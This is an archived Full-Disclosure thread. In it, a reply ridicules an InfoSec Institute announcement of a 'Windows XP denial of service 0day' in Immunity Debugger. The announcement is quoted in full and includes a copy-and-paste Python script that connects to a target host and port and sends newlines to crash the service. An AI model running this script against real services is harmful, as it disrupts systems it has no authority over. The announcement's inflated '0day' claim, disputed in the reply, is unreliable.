Open Source and information security mailing list archives
 
Date: Tue, 17 Apr 2012 13:12:44 +0530
From: Memory Vandal <memvandal@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Windows XP denial of service 0day found in CTF exercise

Windows XP 0day? LOL. Seems InfoSec Institute is going crazy day by day.

And who exploits remote DDoS on 127.0.0.1 and takes a screenshot?! lol

MemoryVandal


On Tue, Apr 17, 2012 at 12:18 PM, Adam Behnke <adam@...osecinstitute.com> wrote:

> Immunity Debugger Remote Denial of Service 0Day
> Tested against version 1.76 and 1.80 on Windows XP distributions
>
> Has not been tested for potential privilege escalation vectors.
>
> We first wrote about Immunity Debugger here:
> http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/
>
> Discovered by a student that wishes to remain anonymous in the course CTF.
> This 0day exploit for Windows was discovered by a student in the InfoSec
> Institute Ethical Hacking class, during an evening CTF exercise. The
> student wishes to remain anonymous, he has contributed a python version of
> the 0day. A patch that can be applied to Windows has not been made
> available. You can find a python version of the exploit to copy and paste
> here:
>
>
> #!/usr/bin/python
> #Windows XP denial of service 0day exploit discovered on 4.9.12 by InfoSec Institute student
> #For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html
> import sys
> import os
> import time
> import getopt
> import socket
>
> class Error(Exception):
>        def __init__(self, error):
>                self.errorStr=error
>
>        def __str__(self):
>                return repr(self.errorStr)
>
> class Exploit():
>
>        def __init__(self, targetHost, targetPort):
>                self.targetHost = targetHost
>
>        def exploit(self, targetHost, targetPort):
>
>                try:
>                        socket.inet_aton(targetHost)
>                        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
>                        s.connect((targetHost,targetPort))
>                except socket.error:
>                        raise Error("Unable to exploit (Connect failed.)")
>                        sys.exit(0)
>
>                # exploit
>                try:
>                        s.sendto("\n\n\n", (targetHost, targetPort))
>                except:
>                        raise Error("Unable to exploit (Exploit failed.)")
>
>
> def usage():
>        print "[!] Usage:"
>        print " ( -h, --help ):"
>        print "         Print this message."
>        print " ( --targetHost= ): Target host."
>        print "         --targetHost=127.0.0.1"
>        print " ( --targetPort= ): Target port."
>        print "         --targetPort=8888"
>
> def main():
>        print "[$] Windows XP 0Day"
>        try:
>                opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=", "targetPort="])
>        except getopt.GetoptError, err:
>                # Print help information and exit:
>                print '[!] Parameter error:' + str(err) # Will print something like "option -a not recognized"
>                usage()
>                sys.exit(0)
>
>        targetHost=None
>        targetPort=None
>
>        for opt, arg in opts:
>                if opt in ("-h", "--help"):
>                        usage()
>                        sys.exit(0)
>                elif opt =="--targetHost":
>                        targetHost=arg
>                elif opt =="--targetPort":
>                        targetPort=arg
>                else:
>                        # I would be assuming to say we'll never get here.
>                        print "[!] Parameter error."
>                        usage()
>                        sys.exit(0)
>
>        if not targetHost:
>                print "[!] Parameter error: targetHost not set."
>                usage()
>                sys.exit(0)
>
>        if not targetPort:
>                print "[!] Parameter error: targetPort not set."
>                usage()
>                sys.exit(0)
>
>        exploit = Exploit(targetHost, targetPort)
>
>        print "[*] Attempting to exploit:"
>
>        try:
>                exploit.exploit(targetHost, int(targetPort))
>        except Error as error:
>                print "[!] Exploit Error: %s" % (error.errorStr)
>                exit(0)
>        print "[*] Exploit appears to have worked."
>
> # Standard boilerplate to call the main() function to begin
> # the program.
> if __name__=='__main__':
>        main()
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
